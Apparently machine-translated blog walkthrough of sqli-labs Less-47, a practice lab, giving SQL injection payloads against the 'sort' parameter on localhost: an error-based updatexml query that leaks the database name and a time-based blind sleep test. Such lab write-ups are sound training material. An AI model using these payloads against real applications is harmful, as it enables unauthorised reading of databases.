sqli-labs (menos-47)

Others 2021-03-22 12:24:00 views: null

sqli-labs (menos-47)

Al ingresar al nivel 47, encontramos que debemos ingresar el valor de clasificación como menos-46. Aquí ingresamos sort = 1 para probar

http://127.0.0.1/sql1/Less-47/?sort=1'


De acuerdo con la visualización del error, el método de cierre se considera '- +, y es la inyección de caracteres. Debido a que hay un eco de error completo, aquí se pueden utilizar el ataque de inyección de error y la inyección ciega de tiempo.

Ataque de inyección de error

Ver biblioteca actual

http://127.0.0.1/sql1/Less-47/?sort=1' and updatexml(1,concat(0x7e,(database()),0x7e),1)--+


Los siguientes pasos son exactamente los mismos que los de less-46. No los presentaré en detalle aquí. Por favor, consulte mi less-46 para conocer el proceso específico.

Tiempo ciego

查看当前数据库长度
http://127.0.0.1/sql1/Less-47/?sort=1' and if(length(database())=8,1,sleep(2))--+


La página responde rápidamente y demuestra que la longitud actual de la base de datos es 8 y que los
siguientes pasos son exactamente los mismos que los de less-46. No entraré en detalles aquí. Consulte mi less-46

Supongo que te gusta

Origin blog.csdn.net/kukudeshuo/article/details/114800974
Recomendado
Clasificación
Diario
Más
2024-05-18(30)
2024-05-17(4)
2024-05-16(22)
2024-05-15(5)
2024-05-14(10)
2024-05-13(7)
2024-05-12(22)
2024-05-11(31)
2024-05-10(32)
2024-05-09(31)

Code World

© 2018 codetd.com